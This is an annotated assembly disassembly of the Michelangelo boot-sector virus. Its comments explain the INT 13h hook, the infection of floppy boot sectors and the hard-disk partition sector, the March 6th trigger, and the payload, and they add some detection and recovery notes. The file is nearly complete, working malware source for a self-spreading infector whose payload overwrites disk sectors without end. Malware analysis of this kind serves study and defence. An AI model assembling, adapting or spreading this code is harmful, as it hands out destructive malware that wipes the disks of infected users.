
  1. ; This is a disassembly of the much-hyped michelangelo virus.
  2. ; As you can see, it is a derivative of the Stoned virus.  The
  3. ; junk bytes at the end of the file are probably throwbacks to
  4. ; the Stoned virus.  In any case, it is yet another boot sector
  5. ; and partition table infector.
  6.  
  7. michelangelo    segment byte public
  8.                 assume  cs:michelangelo, ds:michelangelo
  9.                 org     0
  10.  
  ; Boot-sector image layout.  The BIOS loads this sector to 0:7C00h and
  ; execution starts at the jmp below (entervirus).  The data items that
  ; follow are rewritten in place at boot time (highmemjmp, oldint13h) or
  ; during infection (maxhead, firstsector), so the initial values here
  ; are only placeholders.
  11.                 jmp     entervirus
  12. highmemjmp      db      0F5h, 00h, 80h, 9Fh    ; far ptr 9F80h:00F5h; the segment
                                                      ; word is patched by entervirus
                                                      ; (9F80h = 638K, i.e. 640K - 2K)
  13. maxhead         db      2                       ; used by damagestuff
                                                      ; (raised to 4 for the hard disk)
  14. firstsector     dw      3                       ; sector holding the displaced
                                                      ; original boot block: 3 (360K),
                                                      ; 0Eh (other floppy), 7 (hard disk)
  15. oldint13h       dd      0C8000256h              ; saved INT 13h vector; overwritten
                                                      ; by entervirus before first use
  16.  
  ;-----------------------------------------------------------------------
  ; int13h - resident INT 13h hook (installed at 0:[13h*4] by entervirus)
  ; Only drive 0 (dl = 0) is considered, and only while bit 0 of the BIOS
  ; data byte at 0:43Fh (drive 0 motor flag, per the original comment) is
  ; clear.  Any other request goes straight to the saved vector in
  ; oldint13h.  When it does act it first completes the caller's request
  ; through the original handler, then runs infectdisk, and returns with
  ; the flags the original handler produced.
  ; Detection note: an INT 13h vector pointing into the top-of-memory
  ; segment reserved below the 0:413h size is the visible sign of this hook.
  ;-----------------------------------------------------------------------
  17. int13h:
  18.                 push    ds
  19.                 push    ax
  20.                 or      dl, dl                  ; default drive?
  21.                 jnz     exitint13h              ; exit if not
  22.                 xor     ax, ax
  23.                 mov     ds, ax
  24.                 test    byte ptr ds:[43fh], 1   ; disk 0 on?
  25.                 jnz     exitint13h              ; jnz: exit if the motor bit is
                                                      ; already set (acts only when it
                                                      ; was clear)
  26.                 pop     ax
  27.                 pop     ds
  28.                 pushf                           ; pushf + far call mimics INT
  29.                 call    dword ptr cs:[oldint13h]; first call old int 13h
  30.                 pushf                           ; keep the handler's result flags
  31.                 call    infectdisk              ; then infect
  32.                 popf
  33.                 retf    2                       ; discard flags pushed by the INT
  34. exitint13h:     pop     ax
  35.                 pop     ds
  36.                 jmp     dword ptr cs:[oldint13h]
  37.  
  ;-----------------------------------------------------------------------
  ; infectdisk - called from the int13h hook after the original handler
  ; has serviced a request for drive 0.  ds = es = cs on entry to the body.
  ; Reads cylinder 0 / head 0 / sector 1 of drive 0 into cs:200h (up to
  ; four attempts, resetting the drive in between), compares its first
  ; four bytes with the virus body at cs:0 and quits if they match.
  ; Otherwise the original boot sector is written to head 1 of cylinder 0
  ; at sector 3 (media byte 0FDh = 360K) or sector 0Eh, that sector number
  ; is recorded in firstsector, 21h words of the boot sector starting at
  ; offset partitioninfo are copied into the virus image, and the image at
  ; cs:0 is written over sector 1.  All registers are preserved.
  ; "call oldint13h" on a dd operand assembles to an indirect far call,
  ; the same as the dword ptr form used in int13h.
  ; Recovery note: the displaced boot sector therefore survives at
  ; cylinder 0, head 1, sector firstsector, which is what a clean-up tool
  ; needs in order to put it back.
  ;-----------------------------------------------------------------------
  38. infectdisk:
  39.                 push    ax
  40.                 push    bx
  41.                 push    cx
  42.                 push    dx
  43.                 push    ds
  44.                 push    es
  45.                 push    si
  46.                 push    di
  47.                 push    cs
  48.                 pop     ds
  49.                 push    cs
  50.                 pop     es
  51.                 mov     si, 4                   ; si = read attempts remaining
  52. readbootblock:
  53.                 mov     ax,201h                 ; Read boot block to
  54.                 mov     bx,200h                 ; after virus
  55.                 mov     cx,1
  56.                 xor     dx,dx
  57.                 pushf
  58.                 call    oldint13h
  59.                 jnc     checkinfect             ; continue if no error
  60.                 xor     ax,ax
  61.                 pushf
  62.                 call    oldint13h               ; Reset disk
  63.                 dec     si                      ; loop back
  64.                 jnz     readbootblock
  65.                 jmp     short quitinfect        ; exit if too many
  66.                                                 ; failures
  67. checkinfect:
  68.                 xor     si,si                   ; compare cs:0.. with buffer
  69.                 cld
  70.                 lodsw
  71.                 cmp     ax,[bx]                 ; check if already
  72.                                                 ; infected
  73.                 jne     infectitnow
  74.                 lodsw
  75.                 cmp     ax,[bx+2]               ; check again
  76.                 je      quitinfect
  77. infectitnow:
  78.                 mov     ax,301h                 ; Write old boot block
  79.                 mov     dh,1                    ; to head 1
  80.                 mov     cl,3                    ; sector 3 (ch still 0 = cyl 0)
  81.                 cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
  82.                 je      is360Kdisk
  83.                 mov     cl,0Eh
  84. is360Kdisk:
  85.                 mov     firstsector,cx          ; remember where it went
  86.                 pushf
  87.                 call    oldint13h
  88.                 jc      quitinfect              ; exit on error
  89.                 mov     si,200h+offset partitioninfo
  90.                 mov     di,offset partitioninfo
  91.                 mov     cx,21h                  ; Copy partition table
  92.                 cld
  93.                 rep     movsw                   ; 21h words = 42h bytes
  94.                 mov     ax,301h                 ; Write virus to sector
  95.                                                 ; 1
  96.                 xor     bx,bx
  97.                 mov     cx,1
  98.                 xor     dx,dx
  99.                 pushf
  100.                 call    oldint13h              ; no error check on this write
  101. quitinfect:
  102.                 pop     di
  103.                 pop     si
  104.                 pop     es
  105.                 pop     ds
  106.                 pop     dx
  107.                 pop     cx
  108.                 pop     bx
  109.                 pop     ax
  110.                 retn
  ;-----------------------------------------------------------------------
  ; entervirus - boot-time entry, running from the sector loaded at
  ; 0:7C00h (the cs:[7C00h+...] addressing below only works if cs = 0).
  ; Steps visible here: set ss:sp = 0:7C00h; push 0:7C00h for the final
  ; retf in exitvirus; copy the INT 13h vector at 0:[13h*4] into
  ; oldint13h; lower the BIOS memory-size word at 0:413h by 2 (K);
  ; convert that size to a segment (shl 6 = *64 paragraphs per K) and
  ; patch it into the far pointer highmemjmp; point INT 13h at es:int13h;
  ; copy "offset partitioninfo" bytes of the image to es:0 and far-jump
  ; there.  The partitioninfo area itself is not copied; infectdisk and
  ; infectharddisk refill it before each write.
  ; Detection note: the 2 K drop in the value at 0:413h and an INT 13h
  ; vector pointing into that reserved top-of-memory segment are the
  ; observable signs of the resident copy.
  ;-----------------------------------------------------------------------
  111. entervirus:
  112.                 xor     ax,ax
  113.                 mov     ds,ax
  114.                 cli                             ; no interrupts while ss:sp change
  115.                 mov     ss,ax
  116.                 mov     ax,7C00h                ; Set stack to just
  117.                                                 ; below
  118.                 mov     sp,ax                   ; virus load point
  119.                 sti
  120.                 push    ds                      ; save 0:7C00h on stack
  121.                                                 ; for
  122.                 push    ax                      ; later retf
  123.                 mov     ax,ds:[13h*4]
  124.                 mov     word ptr ds:[7C00h+offset oldint13h],ax
  125.                 mov     ax,ds:[13h*4+2]
  126.                 mov     word ptr ds:[7C00h+offset oldint13h+2],ax
  127.                 mov     ax,ds:[413h]            ; memory size in K
  128.                 dec     ax                      ; reserve 2 x 1 K at the top
  129.                 dec     ax
  130.                 mov     ds:[413h],ax            ; move new value in
  131.                 mov     cl,6
  132.                 shl     ax,cl                   ; ax = paragraphs of
  133.                                                 ; memory (K * 64)
  134.                 mov     es,ax                   ; next line sets seg of
  135.                                                 ; jmp
  136.                 mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
  137.                 mov     ax,offset int13h
  138.                 mov     ds:[13h*4],ax           ; hook INT 13h -> es:int13h
  139.                 mov     ds:[13h*4+2],es
  140.                 mov     cx,offset partitioninfo ; bytes to copy (code + data)
  141.                 mov     si,7C00h
  142.                 xor     di,di
  143.                 cld
  144.                 rep     movsb                   ; copy to high memory
  145.                                                 ; and transfer control
  146.                                                 ; there
  147.                 jmp     dword ptr cs:[7C00h+offset highmemjmp]
  ;-----------------------------------------------------------------------
  ; Continuation after the far jmp: now executing from the top-of-memory
  ; copy, so cs is the segment computed in entervirus; ds = cs, es = 0.
  ; From here on "int 13h" dispatches through the int13h hook installed
  ; above.  Reads the displaced original boot sector back to 0:7C00h (from
  ; drive 80h, head 0, sector 7 when firstsector = 7; otherwise from
  ; drive 0, head 1, sector firstsector), then reads the first hard disk's
  ; sector 1 into cs:200h and branches to infectharddisk unless its first
  ; four bytes already match the virus body.  exitvirus reads the date
  ; via INT 1Ah function 4 and runs the payload only when dx = 0306h
  ; (March 6th; cx, the year, is ignored); otherwise it returns to the
  ; original boot sector through the 0:7C00h pushed by entervirus.
  ; Note the hard-disk branch jumps straight to exitvirus and skips the
  ; hard-disk infection check.
  ;-----------------------------------------------------------------------
  148. ; destination of highmem jmp
  149.                 xor     ax,ax
  150.                 mov     es,ax
  151.                 int     13h                     ; reset disk (dl as left by BIOS)
  152.                 push    cs
  153.                 pop     ds
  154.                 mov     ax,201h
  155.                 mov     bx,7C00h                ; es:bx = 0:7C00h
  156.                 mov     cx,firstsector
  157.                 cmp     cx,7                    ; hard disk infection?
  158.                 jne     floppyboot              ; if not, do floppies
  159.                 mov     dx,80h                  ; Read old partition
  160.                                                 ; table of
  161.                 int     13h                     ; first hard disk to
  162.                                                 ; 0:7C00h (head 0, sector 7)
  163.                 jmp     short exitvirus
  164. floppyboot:
  165.                 mov     cx,firstsector          ; read old boot block
  166.                 mov     dx,100h                 ; to 0:7C00h (head 1, drive 0)
  167.                 int     13h
  168.                 jc      exitvirus
  169.                 push    cs
  170.                 pop     es
  171.                 mov     ax,201h                 ; read boot block
  172.                 mov     bx,200h                 ; of first hard disk
  173.                 mov     cx,1
  174.                 mov     dx,80h
  175.                 int     13h
  176.                 jc      exitvirus
  177.                 xor     si,si                   ; compare cs:0.. with buffer
  178.                 cld
  179.                 lodsw
  180.                 cmp     ax,[bx]                 ; is it infected?
  181.                 jne     infectharddisk          ; if not, infect HD
  182.                 lodsw                           ; check infection
  183.                 cmp     ax,[bx+2]
  184.                 jne     infectharddisk
  185. exitvirus:
  186.                 xor     cx,cx                   ; Real time clock get
  187.                                                 ; date
  188.                 mov     ah,4                    ; dx = mon/day
  189.                 int     1Ah
  190.                 cmp     dx,306h                 ; March 6th (any year)
  191.                 je      damagestuff
  192.                 retf                            ; return control to
  193.                                                 ; original
  194.                                                 ; boot block @ 0:7C00h
  ;-----------------------------------------------------------------------
  ; damagestuff - destructive payload reached from exitvirus.
  ; Starting at cylinder 0, head 0, sector 1 (dx = 0, cx = 1) it issues
  ; INT 13h writes of al sectors from 5000h:5000h: 9 sectors when
  ; firstsector is 3, 0Eh when it is 0Eh, otherwise 11h sectors to drive
  ; 80h with maxhead raised to 4.  After each write the head advances, and
  ; the cylinder once dh reaches maxhead.  A write error only triggers a
  ; disk reset; nothing ends the loop, so it runs until the machine is
  ; reset.  The data written is whatever happens to be at 5000h:5000h.
  ;-----------------------------------------------------------------------
  195. damagestuff:
  196.                 xor     dx,dx                   ; drive 0, head 0
  197.                 mov     cx,1                    ; cylinder 0, sector 1
  198. smashanothersector:
  199.                 mov     ax,309h                 ; write 9 sectors (360K case)
  200.                 mov     si,firstsector
  201.                 cmp     si,3
  202.                 je      smashit
  203.                 mov     al,0Eh                  ; 14 sectors (other floppy)
  204.                 cmp     si,0Eh
  205.                 je      smashit
  206.                 mov     dl,80h                  ; first hard disk
  207.                 mov     maxhead,4
  208.                 mov     al,11h                  ; 17 sectors
  209. smashit:
  210.                 mov     bx,5000h                ; random memory area
  211.                 mov     es,bx                   ; at 5000h:5000h
  212.                 int     13h                     ; Write al sectors to
  213.                                                 ; drive dl
  214.                 jnc     skiponerror             ; no error: skip the reset
  215.                 xor     ah,ah                   ; Reset disk drive dl
  216.                 int     13h
  217. skiponerror:
  218.                 inc     dh                      ; next head
  219.                 cmp     dh,maxhead              ; 2 if floppy, 4 if HD
  220.                 jb      smashanothersector
  221.                 xor     dh,dh                   ; go to next
  222.                                                 ; head/cylinder
  223.                 inc     ch
  224.                 jmp     short smashanothersector ; unconditional: never exits
  ;-----------------------------------------------------------------------
  ; infectharddisk - reached from the check after floppyboot; at this
  ; point cs:200h holds the first hard disk's sector 1 and ds = es = cs.
  ; Writes that sector to cylinder 0 / head 0 / sector 7 of drive 80h
  ; (recorded in firstsector), copies 21h words from offset partitioninfo
  ; of the buffer into the virus image, and writes the image at cs:0 over
  ; sector 1.  cx is 0 after rep movsw, so "inc cl" yields sector 1, not
  ; sector 8 -- the original "Write to sector 8" comment is misleading.
  ; The last int 13h has no error check and falls into the db bytes
  ; below (0EBh = short jmp opcode), which the disassembler flagged.
  ; Recovery note: the original partition sector therefore survives at
  ; cylinder 0, head 0, sector 7 of the first hard disk.
  ;-----------------------------------------------------------------------
  225. infectharddisk:
  226.                 mov     cx,7                    ; Write partition table
  227.                                                 ; to
  228.                 mov     firstsector,cx          ; sector 7
  229.                 mov     ax,301h
  230.                 mov     dx,80h
  231.                 int     13h
  232.                 jc      exitvirus
  233.                 mov     si,200h+offset partitioninfo ; Copy partition
  234.                 mov     di,offset partitioninfo      ; table information
  235.                 mov     cx,21h
  236.                 rep     movsw                   ; leaves cx = 0
  237.                 mov     ax,301h                 ; Write to sector 8 (see header:
                                                      ; cl becomes 1, not 8)
  238.                 xor     bx,bx                   ; Copy virus to sector 1
  239.                 inc     cl                      ; cx = 1: cylinder 0, sector 1
  240.                 int     13h                     ; no error check; falls through
  241. ;*              jmp     short 01E0h
  242.                 db      0EBh, 32h               ; ?This should crash?
  243. ; The following bytes are meaningless.
  ; Nothing in the code above references "garbage"; the disassembler
  ; attributes it to the Stoned ancestry mentioned in the file header.
  244. garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
  ; partitioninfo: 42h-byte area (21h words) that infectdisk and
  ; infectharddisk fill from the original boot sector before each write.
  ; Its offset is also the length of the image copied to high memory.
  245. partitioninfo:  db      42h dup (0)
  246. michelangelo    ends
  247.                 end
  248.  
  249.  
  250.